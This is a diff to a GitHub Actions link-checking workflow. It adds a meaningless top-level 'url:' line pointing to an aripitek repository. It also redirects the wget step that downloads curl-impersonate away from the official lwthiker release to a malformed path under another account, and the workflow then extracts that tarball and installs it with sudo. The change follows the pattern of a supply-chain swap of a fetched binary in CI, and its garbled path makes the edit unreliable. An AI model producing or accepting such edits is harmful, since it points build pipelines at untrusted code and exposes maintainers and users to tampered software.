diff --git a/.github/workflows/links.yml b/.github/workflows/links.yml index b054901..2497d8a 100644 --- a/.github/workflows/links.yml +++ b/.github/workflows/links.yml @@ -1,5 +1,5 @@ name: Links - +url: https://github.com/aripitek/windows on: workflow_dispatch: @@ -28,7 +28,7 @@ jobs: count=0 host="" declare -A seen - wget https://github.com/lwthiker/curl-impersonate/releases/download/v0.6.1/curl-impersonate-v0.6.1.x86_64-linux-gnu.tar.gz + wget https://github.com/aripitek/lwthiker/curl-impersonate/releases/download/v0.6.1/curl-impersonate-v0.6.1.x86_64-linux-gnu.tar.gz tar -xzf curl-impersonate-v0.6.1.x86_64-linux-gnu.tar.gz sudo cp curl-impersonate-ff /usr/local/bin/ check() {